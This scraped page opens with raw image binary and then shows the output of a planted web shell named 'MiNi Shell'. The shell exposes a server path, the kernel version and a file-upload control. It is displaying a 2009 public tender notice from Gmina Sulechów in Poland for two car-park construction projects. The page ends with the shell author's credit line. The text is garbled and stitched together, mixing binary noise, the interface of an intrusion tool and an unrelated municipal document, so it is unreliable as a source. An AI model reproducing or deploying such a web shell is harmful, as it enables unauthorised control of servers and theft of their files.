JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090326/78846-N-2009.html

<p class="kh_header"><b>Sulechów: Budowa parkingu przy ul. Okrężnej w Sulechowie oraz 
budowa parkingu przy ul. Plac Kościelny w Sulechowie, dz. nr 173</b><br>
<b>Numer ogłoszenia: 78846 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa parkingu przy ul. Okrężnej w Sulechowie oraz 
budowa parkingu przy ul. Plac Kościelny w Sulechowie, dz. nr 173.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje wykonanie niżej wymienionych zadań: 
1.1. Zamówienie obejmuje budowę parkingu przy ulicy Okrężnej w Sulechowie, w tym:
1.1.1. Roboty drogowe
1. rozebranie:
1) nawierzchni chodników wraz ze schodami terenowymi z płyt betonowych o wymiarach 35x35x5 cm na podsypce piaskowej,
2) nawierzchni chodników z płyt betonowych o wymiarach 50x50x7 cm na podsypce, 
3) nawierzchni z kostki betonowej na podsypce cementowo-piaskowej,
4) nawierzchni z brukowca o gr. 16 -20 cm, 
5) nawierzchni z mas mineralno-bitumicznych o gr. 4 cm,
6) krawężników betonowych na podsypce cementowo-piaskowej,
7) obrzeży trawnikowych o wymiarach 8x30 cm na podsypce piaskowej,
8) podbudowy z betonu o gr. 15 cm ręcznie,
9) rozebranie ławek parkowych z prefabrykatów żelbetowych, w tym:
- podpory żelbetowe 
- obudowa drewniana siedzeniowa.
2. wykonanie:
1) zabezpieczenia drzew na okres wykonywania robót ziemnych,
2) humusowania skarp z obsianiem, przy grubości warstwy humusu 10 cm, w tym zakup i dowóz na miejsce wbudowania humusu i nasion traw,
3) sadzenia drzew i krzewów liściastych form naturalnych na terenie płaskim w gruncie kat. III, z zaprawą do połowy głębokości dołów, średnica/głębokość 0,5 m -  gatunek drzew i  krzewów do uzgodnienia z Zamawiającym;
4) pielęgnacji drzew liściastych form naturalnych w okresie gwarancyjnym,
5) odspojenia i przewozu humusu taczkami na odległość ok. 10 m z odkładu w celu humusowania terenów zielonych,
6) ręcznego rozplantowania humusu dowiezionego z wykopów,
7) koryta o gł. 30 cm w gruncie kat. II-VI, mechanicznie,
8) koryta o gł. 30 cm w gruncie kat. III-IV, ręcznie,
9) koryta o gł. 20 cm w gruncie kat. III-IV, ręcznie,
10) koryta o gł. 20 cm w gruncie kat. II-VI, mechanicznie,
11) robót ziemnych koparkami przedsiębiernymi o poj. łyżki 0,60 m3 w gruncie kat. I-III, w ziemi uprzednio zmagazynowanej w hałdach, z transportem urobku na odległość 1 km samochodami samowyładowczymi,
12) formowania i zagęszczenia nasypów zapór ziemnych o wys. do 10 m z ziemi dostarczonej samochodami, z wykopów pod parking, grunt kat. III-IV,
13) wymiany pokryw studni 600x1000 na typ ciężki przejazdowy,
14) wymiany ramy studni 600x1000 na typ ciężki przejazdowy,
15) ręcznego kopania rowów dla ułożenia rur osłonowych w gruncie kat. III,
16) podsypki z piasku na dnie rowu kablowego o szerokości do 0,4 m z dowozem piasku na miejsce wbudowania,
17) ręcznego zasypania rowów dla kabli wykonanych w gruncie kat. III dla kabli,
18) zabezpieczenia końców rur pianką poliuretanową,
19) mechanicznego profilowania i zagęszczenia podłoża w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni,
20) podbudowy z gruntu stabilizowanego cementem w ilości 20 kg/m2 o grubości warstwy 10 cm,
21) dolnej warstwy podbudowy o gr. 20 cm z kruszyw łamanych o frakcji 0-32 mm z dowozem na miejsce wbudowania,
22) dolnej warstwy podbudowy o gr. 20 cm z kruszyw łamanych o frakcji 0-62 mm z dowozem na miejsce wbudowania,
23) podbudowy z mieszanek mineralno-bitumicznych asfaltowych, wcinka w istniejącą nawierzchnię,
24) warstwy odcinającej zagęszczonej mechanicznie o gr. 10 cm,
25) nawierzchni parkingu z bruku lubuskiego o gr. 8 cm na podsypce cementowo-piaskowej, z wypełnieniem spoin piaskiem - pasy rozdzielające pola parkingowe koloru żółtego,
26) nawierzchni parkingu z bruku lubuskiego o gr. 8 cm, w kolorze brązowym, na podsypce cementowo-piaskowej, z wypełnieniem spoin piaskiem,
27) nawierzchni z mieszanek mineralno-bitumicznych asfaltowych  o gr. 5 cm - warstwa ścieralna - miejsce styku nawierzchni z bruku lubuskiego i nawierzchni asfaltowej naprawianej po zatopieniu nowego krawężnika,
28) nawierzchni chodnika z bruku lubuskiego w kolorze żółtym o gr. 8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem,
29) oznakowania poziomego jezdni farbą chlorokauczukową - strzałki i inne symbole malowane ręcznie.
3. montaż:
1) rur osłonowych dwudzielnych TYP PS 110 mm,
2) rur osłonowych dwudzielnych TYP PS 160 mm,
3) krawężników betonowych wystających o wymiarach 15x30 cm z wykonaniem ław betonowych z oporem na podsypce cementowo-piaskowej z uwzględnieniem na długości ustawienia krawężników na łukach o promieniu do 10 m,
4) krawężników betonowych najazdowych o wymiarach 15x22 cm z wykonaniem ław betonowych z oporem na podsypce cementowo-piaskowej,
5) krawężników betonowych skośnych o wymiarach 15x22x30 cm z wykonaniem ław betonowych z oporem na podsypce cementowo-piaskowej,
6) obrzeży betonowych o wymiarach 30x8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą cementową, z uwzględnieniem na długości ustawienia obrzeży na łukach o promieniu do 10 m,
7) koszy na śmieci betonowych lub z innego materiału wskazanego przez Zamawiającego, wandaloodpornych, trwale mocowanych do podłoża, osadzonych w uprzednio wykonanych fundamentach,
8) ławek parkowych o konstrukcji żeliwno-drewnianej, mocowanych trwale do podłoża, wandaloodpornych, z fundamentami betonowymi pod każdą nogę - 5 kpl. - wzór ławki do uzgodnienia z Zamawiającym,
4. regulacja pionowa studzienek dla urządzeń podziemnych:
1) studzienki telefoniczne,
2) zawór wodociągowy,
3) włazy kanałowe,
5. wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym, w cenie należy uwzględnić transport do podmiotu zajmującego się odzyskiem odpadów lub transport i składowanie na składowisku odpadów - dot. tej części materiałów, które zgodnie z odrębnymi przepisami zalicza się do opadów; Wykonawca winien posiadać stosowne zezwolenie na transport odpadów lub wykonać tę część zamówienia przy pomocy podmiotu, który takowe posiada.
1.1.2. Odwodnienie drogi
1. wykonanie:
1) robót ziemnych koparkami przedsiębiernymi o poj. łyżki 0,60 m3 w gruncie kat. III z transportem urobku na odległość do 1 km samochodami samowyładowczymi,
2) wykopów w gruncie kat. III z ręcznym załadunkiem i transportem na odległość do 1 km,
3) wykopów oraz przekopów  o głębokości do 3 m na odkład w gruncie kat. I-III, koparkami podsiębiernymi o poj. łyżki 0,60 m3,
4) wykopów liniowych lub jamistych ręcznie w gruncie kat. III o głębokości do 1,5 m ze skarpami o szerokości dna do 1,5 m,
5) wykopów jamistych o głębokości do 3,0 m na odkład w gruncie kat. III koparkami podsiębiernymi o poj. łyżki 0,60 m3,
6) zasypanie wykopów spycharkami z zagęszczeniem mechanicznym, warstwami o grubości w stanie luźnym 30 cm,
7) zasypywanie wykopów ze skarpami ręcznie z przerzutem na odległość do 3 m z zagęszczeniem - grunt kat. I-III,
8) oczyszczającego pompowania z wykopów,
9) oczyszczającego pompowania instalacja urządzeń,
10) odwodnienia igłofiltrami o średnicy do 50 mm wpłukiwanymi bezpośrednio w grunt do głębokości 4 m,
11) mechanicznego oczyszczenie kanałów kołowych sieci zewnętrznej o śr. 20 cm wypełnionych osadem do 1/3 wysokości kanału,
12) podłoża pod kanały z materiałów sypkich o gr. 20 cm - podsypka i obsypka z dowiezionego kruszywa,
13) podłoża pod kanały z materiałów sypkich o gr. 15 cm, nadsypka z dowiezionego kruszywa,
14) próby wodnej szczelności kanałów rurowych o śr. nominalnej 200 mm - 1 próba na 3 odcinkach,
15) przejścia przez ścianę betonową o gr. 15-20 cm dla rurociągów o śr. 200 mm w studniach istniejących,
16) obetonowania włazów betonem B20,
17) podstawy studni z betonu B15,
18) kinet w studzienkach istniejących z betonu B20 po włączeniu nowych kanałów,
19) izolacji wewnętrznej rur betonowych i żelbetowych o śr. 500 mm lepikiem asfaltowym stosowanym na zimno,
20) oznakowania trasy rurociągu ułożonego w ziemi taśmą z tworzywa sztucznego,
21) kamerowania sieci,
22) podłoża pod studzienki o gr. 15 cm z materiałów sypkich,
23) rozbiórki starych kinet,
24) deskowania tradycyjnego ław fundamentowych betonowych lub żelbetowych,
25) zbrojenia konstrukcji monolitycznych prętami stalowymi okrągłymi, gładkimi, o śr. do 14 mm,
26) zbrojenia konstrukcji monolitycznych prętami stalowymi okrągłymi żebrowanymi o śr. do 14 mm,
27) betonowania ław fundamentowych zbrojonych w deskowaniu tradycyjnym beton B-40,
28) odwodnienia liniowego systemowego typu C-250 lub równoważnego.
2. montaż:
1) kanału z rur PPE łączonych na wcisk o średnicy zewn. 200 mm wraz z kształtkami jednokielichowymi,
2) betonowych studzienek ściekowych ulicznych o średnicy 500 mm z osadnikiem i syfonem,
3) studzienek kanalizacyjnych z gotowych elementów z tworzyw sztucznych PPE o średnicy 600 mm i głębokości 1 m.
1.1.3. Zadanie należy zrealizować na podstawie projektu opracowanego przez P.U.P.I. PLAN Sp. z o. o. z siedzibą w Zielonej Górze przy ul. Browarnej 1 i decyzji o pozwoleniu na budowę nr 1195/08 z dnia 16.10.2008 r.

1.2. Zamówienie obejmuje budowę parkingu przy ulicy Plac Kościelny w Sulechowie, w tym:
1. mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o średniej grubości 6 cm oraz ręczne rozebranie nawierzchni z betonu o grubości 15 cm;
2. wykonanie:
1) koryta w gruncie kat. I-IV o gr. 42 cm;
2) profilowania i zagęszczenia podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii I-IV;
3) warstwy odsączającej w korycie o grubości warstwy po zagęszczeniu 16 cm;
4) podbudowy z kruszywa łamanego, tłuczeń kamienny 0-31,5mm, o grubości warstwy po zagęszczeniu 16 cm;
5) nawierzchni z kostki  kamiennej granitowej 10 x 10 cm o grubości 10 cm na podsypce piaskowej z pasami rozdzielczymi z kostki kamiennej w kolorze czarnym;
6) ręcznego plantowania powierzchni gruntu rodzimego kat. I-III;
7) humusowania terenu warstwą humusu o gr. 10 cm i obsiania trawą
3. montaż:
1) krawężników betonowych 20 x 30 cm wraz z wykonaniem ław betonowych z oporem;
2) pionowych znaków drogowych słupków z rur stalowych, Fi 70 mm i znaków o powierzchni do 0,3 m2.
4. Zadanie należy zrealizować na podstawie projektu opracowanego przez Pracownię Projektową INFRA-WB z siedzibą w Świebodzinie przy ul. Jana Pawła II 17b i decyzji o pozwoleniu na budowę nr 1475/08 z dnia 30.12.2008 r.

2. Wykonawca musi uwzględnić:
1) wywiezienie ziemi urodzajnej w miejsce wskazane przez Zamawiającego na terenie miasta;
2) wywiezienie gruzu i materiału z koryta - w cenie należy uwzględnić transport do podmiotu zajmującego się odzyskiem odpadów lub transport i składowanie na składowisku odpadów - dotycz tej części materiałów, które zgodnie z odrębnymi przepisami zalicza się do odpadów; Wykonawca winien posiadać stosowne zezwolenie na transport odpadów lub wykonać tę część zamówienia przy pomocy podmiotu, który takowe posiada;
3) zastosowanie krawężników o kształcie łukowym i odpowiednim promieniu łuku na łukach;
4) połączenie krawężników najazdowych z wystającymi za pomocą skośnych krawężników łączących - skośnych;
5) badanie wskaźnika zagęszczenia gruntu przy czym Is>1, a częstotliwość badań wskaźnika Is min. jedno badanie na 500 m2;
6) uporządkowanie terenów zielonych w obrębie prac drogowych po ich zakończeniu.
3. Zastosowane do wykonania przedmiotu zamówienia betonowe elementy brukowe muszą być dopuszczone do stosowania w budownictwie i muszą spełniać wymagania Polskich Norm tj.:
a) PN-EN 1338:2005 Betonowa kostka brukowa. Wymagania i metody badań.
b) PN-EN 1340:2004 Krawężniki betonowe. Wymagania i metody badań.
przy czym:
dla kostki betonowej:
- odporność na warunki atmosferyczne - klasa 3 oznaczenie D.
- odporność na ścieranie - klasa 4 oznaczenie I
- wytrzymałość na rozciąganie przy rozłupywaniu - zgodna z wymaganiami normy,
dla krawężników betonowych:
- odporność na warunki atmosferyczne - klasa 3 oznaczenie D.
- wytrzymałości na zginanie - klasa 3 oznaczenie U 
- odporność na ścieranie - klasa 4 oznaczenie I
4. Zamawiający zastrzega możliwość przeprowadzenia badań w specjalistycznym laboratorium pod kątem spełnienia wymagań ww. norm losowo pobranej grupy materiałów użytych do wykonania nawierzchni drogi i zjazdów, na koszt Wykonawcy.
5. Wszystkie materiały rozbiórkowe, które nie zostaną ponownie wbudowane, stanowią własność Zamawiającego.
6. Zamówienie może być realizowane do wysokości środków finansowych przeznaczonych w budżecie Gminy Sulechów na rok 2009 na realizację zadań.
7. Wykonawca może przewidzieć wykonanie przedmiotu umowy przy pomocy podwykonawców..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.40-2, 45.23.31.42-6, 45.23.32.53-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 6.900,00 zł (słownie: sześć tysięcy dziewięćset złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu:
1.1. Wykonawca musi spełniać warunki zawarte w art. 24 ust. 1 i 2 i w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
1.2. Sytuacja finansowa:
Wykonawca musi dysponować środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia, przy założeniu, że wynagrodzenie będzie wypłacone jednorazowo po zakończeniu i dokonaniu odbioru końcowego bez zastrzeżeń każdego z zadań określonych w pkt 1 na podstawie wystawionych faktur VAT.
1.3. Doświadczenie zawodowe:
Wykonawca musi wykazać się zrealizowaniem, udokumentowanym np. referencjami, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech zamówień z branży drogowej - to znaczy trzech robót drogowych, w których występowało wykonanie nawierzchni z kostki brukowej betonowej lub z kostki granitowej o powierzchni nie mniejszej niż 300m2 w każdej z tych robót.
1.4. Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia stanowiska kierownika budowy w branży drogowej.
Osoba przewidziana na stanowisko kierownika budowy musi być członkiem Izby Inżynierów Budownictwa i mieć opłacone wymagane składki zgodnie z Ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5, poz. 42, z poźn. zm.) oraz opłacone ubezpieczenie od odpowiedzialności cywilnej zgodnie z Rozporządzeniem Ministra Finansów z dnia 11 grudnia 2003 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów oraz inżynierów budownictwa. (Dz. U. nr 220, poz. 2174 z 2003 r.).
2. Ocena spełniania warunków udziału, w postępowaniu, przez Wykonawców zostanie dokonana we-dług kryterium spełnia/nie spełnia. Wykonawca nie spełniający warunków zostanie wykluczony z postępowania, a jego oferta odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenia i dokumenty, jakie mają dostarczyć Wykonawcy: 
1.1. Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu
1) Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2) W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych do oferty należy dołączyć aktualny od-pis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalno-ści gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert.
3) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ppkt 1.1.2. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem ter-minu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądo-wym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4) W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia do oferty muszą być dołączone:
a) wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje od poprzednich Zamawiających),
b) wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności,
c) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1.1.4) lit. b, wykonawca wskazał osoby, którymi będzie dysponował.
1.2. Inne dokumenty:
1) Formularz oferty.
2) Dane Wykonawcy.
3) W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a) zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt 1.1.1) i 1.1.2).

Uwaga - Zamawiający nie żąda dołączenia do oferty kosztorysu ofertowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego:
Urząd Miejski Sulechów
Plac Ratuszowy 6
66-100 Sulechów
pok. 217.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 10:30, miejsce: Siedziba Zamawiającego:
Urząd Miejski Sulechów
Plac Ratuszowy 6
66-100 Sulechów
Biuro Obsługi Interesanta, pok. 002.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com